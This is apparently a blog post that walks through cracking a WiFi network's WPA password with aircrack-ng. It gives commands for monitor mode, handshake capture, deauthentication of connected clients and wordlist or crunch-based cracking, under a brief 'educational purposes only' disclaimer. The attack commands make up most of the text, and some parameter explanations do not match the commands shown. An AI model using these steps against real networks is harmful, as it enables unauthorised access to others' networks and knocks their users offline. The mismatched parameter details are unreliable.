How to Crack a WiFi

How to Crack a WiFi 960 540 trivium_admin

All information here and below is for educational purposes only, and should only be used on your own networks, or networks that you own. Do NOT break the law.

Using aircrack-ng

root@# ifconfig wlan0 down

root@# iwconfig wlan0 mode monitor

root@# ifconfig wlan0 up

root@# airmon-ng check wlan0

After checking for processes that would interfere with monitor mode –

root@# kill 746

root@# kill 20245

root@# kill 794

airodump-ng wlan0 – for 5GH use –band a [airodump-ng –band a wlan1mon]

scan for wireless networks

then you must capture packs for that SPECIFIC network

airodump-ng -c 153 –bssid AP mac address –essid name_of_network -w nameofcaptirefile wlan1mon

Now you must deauthenticate to capture 4 way hand shake

aireplay-ng -0 5 -a AP mac address -c device mac wlan1mon

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

ath0 is the interface name

After you get a handshake it’s time to crack the file

aircrack-ng -w “wordlist” “capturefile.cap” -e “name of network”

example = aircrack-ng -w /usr/share/wordlists/full3.txt /root/hs/scan_test_nate-01.cap -e Nameof network

you can also use crunch example =

crunch 11 11 -t podcast%%%% 1234567890 | aircrack-ng -w – /root/hs/cap -e podcast2.5

put your card back in managed mode

ifconfig wlan0 down

iwconfig wlan0 mode managed

ifconfig wlan0 up

If you killed process these are them

674 wpa_supplicant

2390 NetworkManager

4932 dhclient

8366 dhclient

AIRCRACK-NG with Crunch and John the Ripper

Kali Linux is an advanced penetration testing tool that should be a part of every security professional’s toolbox. Penetration testing involves using a variety of tools and techniques to test the limits of security policies and procedures. What Kali has done is collect just about everything you’ll need in a single CD. It includes more than 300 different tools, all of which are open source and available on GitHub.

Leave a Reply

Your email address will not be published.